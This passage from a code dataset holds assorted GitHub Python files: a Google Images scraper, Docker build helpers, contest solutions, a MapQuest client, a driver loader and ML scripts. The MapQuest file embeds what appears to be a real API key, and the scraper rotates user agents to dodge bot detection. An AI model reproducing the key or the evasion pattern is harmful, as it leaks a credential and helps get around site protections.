policy_actor_state_dict = torch.load(str(self.model_dir) + '/actor.pt', map_location=self.device)\n        self.algo_module.actor.load_state_dict(policy_actor_state_dict)\n","repo_name":"TARTRL/TiKick","sub_path":"tmarl/drivers/shared_distributed/base_driver.py","file_name":"base_driver.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"61"} +{"seq_id":"18611608563","text":"import csv\nimport time\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# Initialize the Selenium webdriver\ndriver = webdriver.Chrome()\n\n# A list of different User-Agents\nuser_agents = [\n    \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\n    \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36\",\n    \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0\",\n    \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/89.0\",\n    # Add any other User-Agents you want to use\n]\n\n# Function to generate a variable
 delay\ndef random_delay():\n    delay = random.uniform(1, 3) # Replace with the desired delay range\n    time.sleep(delay)\nloop = 0\n# Open the CSV file for writing the data\nwith open('./out.csv', 'a', newline='') as csv_file:\n    writer = csv.writer(csv_file)\n    writer.writerow(['key', 'value', 'img']) # Write the column headers\n\n    # Loop through every barcode in the CSV file\n    with open('./pd.csv', 'r') as barcode_file:\n        reader = csv.reader(barcode_file)\n        \n        # Skip the first header row if there is one\n        next(reader)\n        \n        # Loop through every row in the CSV file\n        for row in reader:\n            barcode = row[0] # Take the barcode value from the first column\n            nama = row[1] # Take the name value from the second column\n\n            # Initialize the Chrome WebDriver\n            chrome_options = Options()\n            chrome_options.add_argument(\"--headless\") # Run in headless mode (without a browser window)\n            chrome_options.add_argument(f\"user-agent={random.choice(user_agents)}\") # Pick a User-Agent at random\n            driver = webdriver.Chrome(options=chrome_options)\n\n            # The URL to open\n            url = f'https://www.google.com/search?q={barcode} {nama}&tbm=isch'\n            \n            # Open the URL using the webdriver\n            driver.get(url)\n            random_delay()\n\n            # Take a screenshot and save it to a file\n            screenshot_path = barcode + \".png\" # Set the path and file name for saving the screenshot\n            driver.save_screenshot(screenshot_path)\n            # Write the data to the CSV file\n            writer.writerow([barcode, nama, screenshot_path])\n            loop +=1\n            print(f\"{barcode}: Success - {loop} :: {screenshot_path}\")\n\n            # Close the webdriver after taking the image\n            driver.quit()\n","repo_name":"nurramdandoni/scraping-data","sub_path":"scraping image produk/getImageAutoAgenDelayShot.py","file_name":"getImageAutoAgenDelayShot.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22730576976","text":"import os, sys\nmodd_str = os.path.abspath(os.path.dirname(__file__)) # module dir\n\nimport subprocess\nfrom colored import fg, bg, attr\n\nsys.path.append(\"%s/../../gf_core\"%(modd_str))\nimport gf_core_cli\n\nimport gf_os_docker\n\n#-------------------------------------------------------------\n# PULL\ndef pull(p_image__full_name_str,\n\tp_log_fun,\n\tp_docker_user_str = None,\n\tp_docker_pass_str = None,\n\tp_exit_on_fail_bool = True,\n\tp_docker_sudo_bool = False):\n\n\t# oftentimes public containers are being pulled, so no login is needed for that and \n\t# callers don't submit their credentials.\n\tif not p_docker_pass_str == None and not p_docker_pass_str == \"\":\n\t\tgf_os_docker.login(p_docker_user_str,\n\t\t\tp_docker_pass_str,\n\t\t\tp_exit_on_fail_bool = True,\n\t\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n\t# DOCKER_PULL\n\tcmd_lst = []\n\tif p_docker_sudo_bool:\n\t\tcmd_lst.append(\"sudo\")\n\t\n\tcmd_lst.extend([\n\t\t\"docker pull\",\n\t\tp_image__full_name_str\n\t])\n\tc_pull = \" \".join(cmd_lst)\n\tp_log_fun(\"INFO\", \"cmd - %s\"%(c_pull))\n\n\tp = subprocess.Popen(c_pull,\n\t\tshell = True,\n\t\tstdout = subprocess.PIPE,\n\t\tbufsize = 1)\n\n\tfor line in p.stdout:\n\t\tclean_line_str = line.strip()\n\t\tprint(clean_line_str)\n\n\tif p_exit_on_fail_bool:\n\t\tif not p.returncode == None and not p.returncode == 0:\n\t\t\texit()\n\n#-------------------------------------------------------------\n# BUILD\ndef build(p_app_name_str,\n\tp_app_build_meta_map,\n\tp_log_fun,\n\tp_app_web_meta_map = None,\n\tp_user_name_str = \"local\",\n\tp_git_commit_hash_str = None,\n\tp_exit_on_fail_bool 
= False,\n\tp_docker_sudo_bool = False):\n\tp_log_fun(\"FUN_ENTER\", \"gf_containers.build()\")\n\tp_log_fun(\"INFO\", f\"p_app_name_str - {p_app_name_str}\")\n\tassert isinstance(p_app_name_str, str)\n\tassert isinstance(p_app_build_meta_map, dict)\n\n\t#------------------\n\t# META\n\n\tassert \"service_name_str\" in p_app_build_meta_map\n\tassert \"service_base_dir_str\" in p_app_build_meta_map\n\n\tservice_name_str = p_app_build_meta_map[\"service_name_str\"]\n\tservice_base_dir_str = p_app_build_meta_map[\"service_base_dir_str\"]\n\tassert os.path.isdir(service_base_dir_str)\n\n\t# service_dockerfile_path_str = \"%s/Dockerfile\"%(service_base_dir_str)\n\tservice_dockerfile_path_str = get_service_dockerfile(p_app_build_meta_map)\n\t\n\t#------------------\n\t# COPY_FILES_TO_DIR\n\tif \"copy_to_dir_lst\" in p_app_build_meta_map.keys():\n\t\tcopy_to_dir_lst = p_app_build_meta_map[\"copy_to_dir_lst\"]\n\t\tcopy_files(copy_to_dir_lst)\n\n\t#------------------\n\t# PREPARE_WEB_FILES\n\tif not p_app_web_meta_map == None:\n\t\tassert isinstance(p_app_web_meta_map, dict)\n\t\tassert \"pages_map\" in p_app_web_meta_map.keys()\n\t\tpages_map = p_app_web_meta_map[\"pages_map\"]\n\n\t\tprepare_web_files(pages_map,\n\t\t\tservice_base_dir_str,\n\t\t\tp_log_fun,\n\t\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n\t#------------------\n\t# IMAGE_FULL_NAMES\n\timage_name_str = service_name_str\n\timage_full_names_lst = get_image_full_names(image_name_str,\n\t\tp_app_build_meta_map,\n\t\tp_user_name_str,\n\t\tp_git_commit_hash_str = p_git_commit_hash_str)\n\n\t#------------------\n\t# BUILD_ARGS\n\tbuild_args_map = {}\n\n\t# BASE_IMAGE_TAG - tag of the base image from which the main image thats being\n\t# built from is inheriting from.\n\tif not p_git_commit_hash_str == None:\n\t\tbuild_args_map[\"GF_BASE_IMAGE_TAG\"] = p_git_commit_hash_str\n\telse:\n\t\tbuild_args_map[\"GF_BASE_IMAGE_TAG\"] = \"latest\"\n\t\n\t#------------------\n\t# DOCKER_BUILD\n\tgf_os_docker.build_image(image_full_names_lst,\n\t\tservice_dockerfile_path_str,\n\t\tp_log_fun,\n\t\tp_build_args_map = build_args_map,\n\t\tp_exit_on_fail_bool = p_exit_on_fail_bool,\n\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n\t#------------------\n\n#-------------------------------------------------------------\n# PUBLISH\ndef publish(p_app_name_str,\n\tp_app_build_meta_map,\n\tp_docker_user_str,\n\tp_docker_pass_str,\n\tp_log_fun,\n\tp_git_commit_hash_str = None,\n\tp_exit_on_fail_bool = False,\n\tp_docker_sudo_bool = False):\n\tp_log_fun(\"FUN_ENTER\", \"gf_containers.publish()\")\n\tp_log_fun(\"INFO\", \"p_app_name_str - %s\"%(p_app_name_str))\n\tassert isinstance(p_app_build_meta_map, dict)\n\n\tif \"service_name_str\" in p_app_build_meta_map.keys():\n\t\tservice_name_str = p_app_build_meta_map[\"service_name_str\"]\n\t\timage_name_str = service_name_str\n\telse:\n\t\timage_name_str = p_app_name_str\n\n\t# service_version_str = p_app_build_meta_map[\"version_str\"]\n\t#\n\t# image_tag_str = None\n\t# if not p_git_commit_hash_str == None:\n\t# \timage_tag_str = p_git_commit_hash_str\n\t# else:\n\t# \tservice_version_str = p_app_build_meta_map[\"version_str\"]\n\t# \timage_tag_str = service_version_str\n\n\timage_full_names_lst = get_image_full_names(image_name_str,\n\t\tp_app_build_meta_map,\n\t\tp_docker_user_str,\n\t\tp_git_commit_hash_str = p_git_commit_hash_str)\n\tassert isinstance(image_full_names_lst, list)\n\t\n\tfor image_full_name_str in image_full_names_lst:\n\t\t\n\t\t# 
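DOCKER_PUSH - pushes each computed image name (both the version/commit tag and the \"latest\" tag) to the registry\n\t\t# 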
DOCKER_PUSH\n\t\tgf_os_docker.push(image_full_name_str,\n\t\t\tp_docker_user_str,\n\t\t\tp_docker_pass_str,\n\t\t\tp_log_fun,\n\t\t\tp_exit_on_fail_bool = p_exit_on_fail_bool,\n\t\t\tp_docker_sudo_bool = p_docker_sudo_bool)\n\n#-------------------------------------------------------------\n# GET_IMAGE_FULL_NAMES\ndef get_image_full_names(p_image_name_str,\n\tp_app_build_meta_map,\n\tp_user_name_str,\n\tp_git_commit_hash_str = None):\n\tassert isinstance(p_image_name_str, str)\n\tassert isinstance(p_app_build_meta_map, dict)\n\tassert isinstance(p_user_name_str, str)\n\n\t# IMAGE_TAG\n\timage_tag_str = None\n\tif not p_git_commit_hash_str == None:\n\t\t# if a git commit hash was supplied, tag the image with that\n\t\timage_tag_str = p_git_commit_hash_str\n\telse:\n\t\tservice_version_str = p_app_build_meta_map[\"version_str\"]\n\t\t# assert len(service_version_str.split(\".\")) == 4 # format x.x.x.x\n\t\timage_tag_str = service_version_str\n\n\timage_full_names_lst = []\n\n\t# standard name\n\timage_full_name_str = \"%s/%s:%s\"%(p_user_name_str, p_image_name_str, image_tag_str)\n\timage_full_names_lst.append(image_full_name_str)\n\n\t# IMPORTANT!! - \"latest\" name - it's important to always have a \"latest\" image that points\n\t# to the most up-to-date container image for use in situations when we don't know\n\t# the version number or git commit hash or some other tag.\n\tif not image_tag_str == \"latest\":\n\t\timage_full_name_latest_str = \"%s/%s:latest\"%(p_user_name_str, p_image_name_str)\n\t\timage_full_names_lst.append(image_full_name_latest_str)\n\n\treturn image_full_names_lst\n\n#-------------------------------------------------------------\ndef copy_files(p_copy_to_dir_lst):\n\tassert isinstance(p_copy_to_dir_lst, list)\n\n\tprint(\"\")\n\tprint(\" COPY FILES\")\n\tfor src_f_str, target_dir_str in p_copy_to_dir_lst:\n\t\tif not os.path.isdir(target_dir_str):\n\t\t\tgf_core_cli.run(\"mkdir -p %s\"%(target_dir_str))\n\t\tgf_core_cli.run(\"cp %s %s\"%(src_f_str, target_dir_str))\n\n#-------------------------------------------------------------\n# PREPARE_WEB_FILES\ndef prepare_web_files(p_pages_map,\n\tp_service_base_dir_str,\n\tp_log_fun,\n\tp_docker_sudo_bool = False):\n\tp_log_fun(\"FUN_ENTER\", \"gf_containers.prepare_web_files()\")\n\tassert isinstance(p_pages_map, dict)\n\tassert os.path.dirname(p_service_base_dir_str)\n\n\tfor pg_name_str, pg_info_map in p_pages_map.items():\n\t\tprint(f\"======== {fg('green')}{'%s'%(pg_name_str)}{attr(0)}\")\n\t\tassert isinstance(pg_info_map, dict)\n\t\tassert \"build_dir_str\" in pg_info_map.keys()\n\t\tassert os.path.isdir(pg_info_map[\"build_dir_str\"])\n\n\t\tbuild_dir_str = os.path.abspath(pg_info_map[\"build_dir_str\"])\n\n\t\t#------------------\n\t\t# CREATE_TARGET_DIR\n\t\ttarget_dir_str = os.path.abspath(f\"{p_service_base_dir_str}/static\")\n\t\tgf_core_cli.run(f\"mkdir -p {target_dir_str}\")\n\n\t\t#------------------\n\t\t# COPY_PAGE_WEB_CODE\n\t\tgf_core_cli.run(f\"cp -r {build_dir_str}/* {target_dir_str}\")\n\n\t\t#------------------\n\t\t\n\t#------------------\n\t# MOVE_TEMPLATES_OUT_OF_STATIC\n\n\t# IMPORTANT!! - templates should not be in the static/ dir, which would make them servable\n\t# over HTTP which we don't want. 
instead its moved out of the static/ dir \n\t# to its parent dir where its private.\n\t# templates are originally in the static/ dir because durring the build process they were\n\t# handled together with other static content (html/css/js files) and as output moved\n\t# into that static/ dir from other locations while in development.\n\tgf_core_cli.run(\"rm -rf %s/../templates\"%(target_dir_str)) # remove existing templates build dir\n\tgf_core_cli.run(\"mv %s/templates %s/..\"%(target_dir_str, target_dir_str))\n\t\n\t#------------------\n\n#-------------------------------------------------------------\ndef get_service_dockerfile(p_app_build_meta_map):\n\tservice_base_dir_str = p_app_build_meta_map[\"service_base_dir_str\"]\n\tassert os.path.isdir(service_base_dir_str)\n\n\tif \"service_dockerfile_path_str\" in p_app_build_meta_map.keys():\n\t\tservice_dockerfile_path_str = p_app_build_meta_map[\"service_dockerfile_path_str\"]\n\telse:\n\t\tservice_dockerfile_path_str = \"%s/Dockerfile\"%(service_base_dir_str)\n\n\treturn service_dockerfile_path_str","repo_name":"gloflow/gloflow","sub_path":"py/gf_ops/containers/gf_containers.py","file_name":"gf_containers.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"23555823241","text":"t = int(input())\n\nfor i in range(1, t+1):\n n = input()\n\n\n tidy = False\n while not tidy:\n num = [] \n for item in range(len(n)):\n num.append(int(n[item]))\n\n change = False \n for j in range(len(num)-1):\n if num[j]>num[j+1]:\n num[j] -= 1\n bad = j+1\n change = True\n break\n\n if change:\n for k in range(bad, len(num)):\n num[k] = 9\n\n if num[0] == 0:\n num.pop(0)\n\n tidy = True\n for j in range(len(num)-1):\n if num[j]>num[j+1]:\n tidy = False\n\n n = ''\n for k in range(len(num)):\n n += str(num[k])\n\n print(\"Case #{}: {}\".format(i, n))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2511.py","file_name":"2511.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27017990438","text":"import urllib.request\nimport urllib.parse\nimport json\n\nBASE_MAPQUEST_DESTINATION_URL = 'http://open.mapquestapi.com/directions/v2/route'\nBASE_MAPQUEST_ELEVATION_URL = 'http://open.mapquestapi.com/elevation/v1/profile'\nMAPQUEST_API_KEY = 'hIZ98AIBoOx3ZiEH2562DAwJYyuiMCXA'\n\ndef build_destination_url(places: [str]) -> str:\n '''\n Creates the URL for the route. If there are multiple destinations,\n adds the extra destinations to the end.\n '''\n parameters = [\n ('key', MAPQUEST_API_KEY), ('from', places[0])\n ]\n del places[0]\n for index in range(len(places)):\n parameters.append(('to', places[index]))\n return BASE_MAPQUEST_DESTINATION_URL+'?'+urllib.parse.urlencode(parameters)\n\ndef build_elevation_url(lat_long: [str]) -> str:\n '''\n Creates the URL for the elevation. 
\ndef build_elevation_url(lat_long: [str]) -> str:\n    '''\n    Creates the URL for the elevation. Attaches all the latitudes\n    and longitudes of the destinations.\n    '''\n    parameters = [\n        ('key', MAPQUEST_API_KEY), ('shapeFormat', 'raw')\n    ]\n    url = BASE_MAPQUEST_ELEVATION_URL+'?'+urllib.parse.urlencode(parameters)+'&latLngCollection='\n    counter = 0\n    for latlong in lat_long:\n        if counter != len(lat_long)-1:\n            url = url + latlong + ','\n            counter += 1\n        else:\n            url = url + latlong\n\n    # turns the units to feet\n    url = url + '&unit=f'\n    return url\n\ndef get_result(url: str) -> 'json text':\n    '''\n    Returns the result from reading the URL\n    '''\n    response = None\n    try:\n        response = urllib.request.urlopen(url)\n        return json.load(response)\n    finally:\n        if response is not None:\n            response.close()\n","repo_name":"andrewttsui/MapQuest-GPS","sub_path":"project3_api.py","file_name":"project3_api.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44462075407","text":"from inaugurator import pyudev\nfrom inaugurator import sh\nimport logging\nimport os\nimport fnmatch\n\n\n_ALSO = {\n    'mlx4_core': ['mlx4_en']\n}\n\n\ndef loadAllDrivers():\n    context = pyudev.Context()\n    aliasTable = _loadAliasTable()\n    deviceList = list(context.list_devices())\n    for device in deviceList:\n        if u'MODALIAS' not in device:\n            continue\n        try:\n            for k, v in device.iteritems():\n                logging.info(\"\\t%s: %s\" % (k.encode('utf-8'), v.encode('utf-8')))\n        except Exception as e:\n            logging.info(str(e))\n            logging.warning(\"WARNING: failed to log driver details, will not load this device. Skipping.\")\n            continue\n        driver = _findDriver(device, aliasTable)\n        if driver is None:\n            logging.info(\"No driver, skipping\")\n        else:\n            _loadDriver(driver)\n\n\ndef _loadDriver(driver):\n    \"This handles upward dependencies, not modprobe-like dependencies\"\n    logging.info(\"Driver: %s, modprobing\" % driver)\n    sh.run(\"busybox modprobe %s\" % driver)\n    if driver in _ALSO:\n        logging.info(\"Additional drivers must be loaded for '%s': %s\" % (driver, _ALSO[driver]))\n        for also in _ALSO[driver]:\n            _loadDriver(also)\n\n\ndef _kernelVersion():\n    return sh.run(\"busybox uname -r\").strip()\n\n\ndef _loadAliasTable():\n    path = os.path.join(\"/lib/modules/%s/modules.alias\" % _kernelVersion())\n    table = dict()\n    with open(path) as f:\n        for line in f.readlines():\n            if line.startswith(\"#\"):\n                continue\n            alias, driver = line.strip().split(\" \")[1:]\n            if ':' not in alias:\n                continue\n            subsystem = alias.split(\":\")[0]\n            if subsystem not in table:\n                table[subsystem] = dict()\n            logging.info(alias)\n            table[subsystem][alias] = driver\n    return table\n\n\ndef _lookLike(alias, pattern):\n    # cheap substring pre-check before the full fnmatch\n    parts = pattern.split(\"*\")\n    for part in parts:\n        if part not in alias:\n            return False\n    return True\n\n\ndef _findDriver(device, aliasTable):\n    alias = device[u'MODALIAS']\n    subsystem = alias.split(\":\")[0]\n    for pattern in aliasTable.get(subsystem, dict()):\n        if _lookLike(alias, pattern):\n            if fnmatch.fnmatch(alias, pattern):\n                return aliasTable[subsystem][pattern]\n    return None\n\n\nif __name__ == \"__main__\":\n    global _kernelVersion\n    ver = _kernelVersion()\n\n    def _kernelVersion():\n        return ver\n\n    def fakeSH(command):\n        logging.info(\"COMMAND - %s\", command)\n    sh.run = fakeSH\n    loadAllDrivers()\n","repo_name":"Stratoscale/inaugurator","sub_path":"inaugurator/udev.py","file_name":"udev.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72860738114","text":"#!/usr/bin/env 
python\nimport os\nfrom setuptools import setup, find_packages\n\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\n\n# Dynamically calculate the version based on photologue.VERSION\nversion_tuple = __import__('photologue').VERSION\nif len(version_tuple) == 3:\n version = \"%d.%d.%s\" % version_tuple\nelse:\n version = \"%d.%d\" % version_tuple[:2]\n\nsetup(\n name = \"django-photologue-praekelt\",\n version = version,\n description = \"Powerful image management for the Django web framework. Praekelt fork.\",\n author = \"Justin Driscoll\",\n author_email = \"hedley@praekelt.com\",\n url = \"https://github.com/praekelt/django-photologue/\",\n packages = find_packages(),\n package_data = {\n 'photologue': [\n 'res/*.jpg',\n 'locale/*/LC_MESSAGES/*',\n 'templates/photologue/*.html',\n 'templates/photologue/tags/*.html',\n ]\n },\n zip_safe = False,\n test_suite=\"setuptest.setuptest.SetupTestSuite\",\n tests_require=[\n 'django-setuptest>=0.1.4',\n 'Pillow',\n ],\n classifiers = ['Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Utilities'],\n)\n","repo_name":"praekelt/django-photologue","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"61"} +{"seq_id":"23446724911","text":"T = int(input())\r\nfor I in range(1, T+1):\r\n n, x = [int(x) for x in input().split()]\r\n sizes = [int(x) for x in input().split()]\r\n sizes.sort()\r\n # find the biggest for smallest:\r\n good = 0\r\n for i in range(0, n):\r\n if (sizes[0] + sizes[i] <= x):\r\n good = i\r\n if (good == 0):\r\n result = n\r\n else:\r\n skipped = n - good - 1\r\n found = 0\r\n begin = 0\r\n end = good\r\n while (begin < end):\r\n if (sizes[begin] + sizes[end] <= x):\r\n begin += 1\r\n end -= 1\r\n found += 1\r\n else:\r\n end -= 1\r\n skipped += 1\r\n if begin == end:\r\n skipped += 1\r\n result = skipped + found\r\n \r\n \r\n print(\"Case #%d: %s\" % (I, result))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_148/217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7605866242","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 19 21:32:25 2021\n\n@author: Dietrich\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\n\n#%% Problem 1\n\n# Read in data\ntrain = pd.read_csv('C:/Users/Dietrich/Documents/GitHub/Deep-Learning-Labs/Lab 5/Scripts/data.csv')\n\n# Handle missing values\ndata = train.select_dtypes(include=[np.number]).interpolate().dropna()\n\n# Delete rows where GarageArea == 0, meaning there was either no garage\n# or GarageArea was not properly recorded.\ndata = data[data.GarageArea != 0]\n\n##Build a linear model\ny = np.log(data.SalePrice)\nX = data.drop(['SalePrice', 'Id'], axis=1)\n\n\n# Plot Sale Price vs Garage Area to check for outliers\nplt.scatter(data.GarageArea,y)\nplt.xlabel('Garage Area')\nplt.ylabel('Sale Price')\nplt.title('Sale Price vs Garage Area')\n\n#%% Problem 2 and 3\n\n# Read in data\ntrain = 
pd.read_csv('C:/Users/Dietrich/Documents/GitHub/Deep-Learning-Labs/Lab 5/Scripts/data2.csv')\n# Initialize Plot\nplt.style.use(style = 'ggplot')\nplt.rcParams['figure.figsize'] = (10,6)\n\n#Convert Categorical data to numerical\ntrain['City Group'] = train['City Group'].map( {'Big Cities': 1, 'Other': 0} ).astype(int)\ntrain['Type'] = train['Type'].map( {'FC': 0, 'IL': 1, 'DT': 2, 'MB':3} ).astype(int)\n\n# Get stats for revenue column and check skew\nprint(train.revenue.describe())\nprint(train.revenue.skew())\n#plt.hist(train.revenue)\nplt.show()\ny = np.log(train.revenue)\nprint('skew is', y.skew())\nplt.hist(y)\n\n\n#%%\n# Check correlation\nnumeric_features = train.select_dtypes(include=[np.number])\ncorr = numeric_features.corr()\ntop_corr = corr['revenue'].sort_values(ascending=False)[:6]\nprint(corr['revenue'].sort_values(ascending=False)[:6],'\\n')\nprint(corr['revenue'].sort_values(ascending=False)[-5:])\n\n\n\n\n#%% Model Creation\n\n# Initialize X and Y data\ny = np.log(train.revenue)\n#X = train.drop(['revenue', 'Id'], axis=1)\nX = train[top_corr.index.drop('revenue')]\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42, test_size=.33)\n# Perform Linear Regression\nlr = linear_model.LinearRegression()\n# Fit model to training data\nmodel = lr.fit(X_train, y_train)\n# Evaluate the performance and visualize results\nprint (\"R^2 is: \\n\", model.score(X_test, y_test))\npredictions = model.predict(X_test)\nprint ('RMSE is: \\n', mean_squared_error(y_test, predictions))\n\n#%%\n##visualize\n\nactual_values = y_test\nplt.scatter(predictions, actual_values, alpha=.75, color='b') #alpha helps to show overlapping data\n\nplt.xlabel('Predicted Price')\nplt.ylabel('Actual Price')\nplt.title('Linear Regression Model')\nplt.show()\n","repo_name":"dxkruse/Deep-Learning-Labs","sub_path":"Lab 5/Scripts/ICP5.py","file_name":"ICP5.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29579712407","text":"from setuptools import setup, find_packages\n\n\nPACKAGENAME = \"thechopper\"\nVERSION = \"0.1\"\n\n\nsetup(\n name=PACKAGENAME,\n version=VERSION,\n setup_requires=[\"pytest-runner\"],\n author=\"Andrew Hearin\",\n author_email=\"ahearin@anl.gov\",\n description=\"Python tools to subdivide cosmological simulations and tabulate synthetic observables\",\n long_description=\"Python tools to subdivide cosmological simulations and tabulate synthetic observables\",\n install_requires=[\"numpy\"],\n packages=find_packages(),\n url=\"https://github.com/ArgonneCPAC/thechopper\",\n)\n","repo_name":"ArgonneCPAC/thechopper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74179581634","text":"from itertools import permutations\nfrom typing import (Iterable,\n Dict)\n\nfrom utils import (prime_numbers,\n digits_to_number,\n number_to_digits)\n\n\ndef sub_string_divisible_numbers(*,\n digits: Iterable[int],\n slicers_by_divisors: Dict[int, slice]\n ) -> Iterable[int]:\n for digits in permutations(digits):\n number = digits_to_number(digits)\n digits = list(number_to_digits(number))\n for divisor, slicer in slicers_by_divisors.items():\n digits_slice = digits[slicer]\n sliced_number = digits_to_number(digits_slice)\n if sliced_number % divisor:\n break\n else:\n yield number\n\n\nprimes_generator 
= prime_numbers(18)\nslicers_by_divisors = {next(primes_generator): slice(start - 1, start + 2)\n for start in range(2, 9)}\n\nassert sum(sub_string_divisible_numbers(\n digits=range(10),\n slicers_by_divisors=slicers_by_divisors)) == 16_695_334_890\n","repo_name":"lycantropos/Project-Euler","sub_path":"43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23548794271","text":"Cases = int(input())\nfor Case in range(Cases):\n\ts, k = input().split()\n\ts = [1 if c=='-' else 0 for c in s]\n\tk = int(k)\n\tu = 0\n\tfor i in range(len(s)-k+1):\n\t\tif s[i] == 1:\n\t\t\tfor j in range(k):\n\t\t\t\ts[i+j] = 1-s[i+j]\n\t\t\tu += 1\n\tif sum(s) == 0:\n\t\tprint('Case #%d: %d' % (Case+1, u))\n\telse:\n\t\tprint('Case #%d: IMPOSSIBLE' % (Case+1))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/630.py","file_name":"630.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71732798275","text":"import pickle\r\nimport matplotlib.pyplot as plt \r\nimport numpy as np\r\nimport pandas as pd\r\nimport cv2\r\nimport os\r\nimport csv\r\nfrom options import Trainandverify\r\n\r\n\r\n\r\n# cv2.imshow('img',img)\r\n# cv2.waitKey(0)\r\nC = './predict'\r\nD = 'D:\\work\\Masterdegree\\shapmatching\\predict'\r\nparser = Trainandverify()\r\nopts = parser.parse()\r\nprint(opts.file_name)\r\npath = C\r\nfile_list = os.listdir(path)\r\nfilter_list = []\r\ntarget = opts.file_name\r\nimg = cv2.imread('../data/style/' + opts.pic+'.png').astype('float')\r\nh,w,_ = img.shape\r\nh = int(h)\r\nw = int(w)\r\nfor f in file_list:\r\n if target in f :\r\n filter_list.append(f)\r\n\r\nfor fi in filter_list: \r\n\r\n # file_target = '0_e_f_6_19042022-1250im-10001ep-rec-100-sadv-4.0'\r\n file_target = fi\r\n arr = os.listdir(os.path.join(path , file_target))\r\n b = dict()\r\n g = dict()\r\n r = dict()\r\n t = dict()\r\n length = len(arr)\r\n i =0\r\n for filename in arr:\r\n img2 = cv2.imread(os.path.join(os.path.join(path , file_target),filename)).astype('float')\r\n nh,nw,_ = img2.shape\r\n img = cv2.resize(img,(nw,nh))\r\n b.update({int(filename.split('_')[0]):np.mean(np.abs(img[:,:,0]-img2[:,:,0])).astype('float')})\r\n g.update({int(filename.split('_')[0]):np.mean(np.abs(img[:,:,1]-img2[:,:,1])).astype('float')})\r\n r.update({int(filename.split('_')[0]):np.mean(np.abs(img[:,:,2]-img2[:,:,2])).astype('float')})\r\n t.update({int(filename.split('_')[0]):np.mean(np.abs(img-img2)).astype('float')})\r\n i += 1\r\n print('Process: %d/%d'%(i,length))\r\n\r\n s_b = dict(sorted(b.items()))\r\n s_g = dict(sorted(g.items()))\r\n s_r = dict(sorted(r.items()))\r\n s_t = dict(sorted(t.items()))\r\n epoch = []\r\n b_err = []\r\n g_err = []\r\n r_err = []\r\n t_err = []\r\n for k,v in s_b.items():\r\n \r\n epoch.append(k)\r\n b_err.append(v)\r\n\r\n for k,v in s_g.items():\r\n g_err.append(v)\r\n\r\n for k,v in s_r.items():\r\n r_err.append(v)\r\n for k,v in s_t.items():\r\n t_err.append(v)\r\n\r\n file = open('./losses/' + file_target +'.csv')\r\n csvreader = csv.reader(file)\r\n rows=[]\r\n for row in csvreader:\r\n \r\n if row[3] != 'Lrec':\r\n rows.append(row[3])\r\n file.close\r\n\r\n save_list = {\r\n 'epoch': epoch,\r\n 'B_err': b_err,\r\n 'G_err': g_err,\r\n 'R_err': r_err,\r\n 'Total_err': t_err,\r\n 'Train_err': rows,\r\n }\r\n\r\n df = pd.DataFrame(save_list)\r\n 
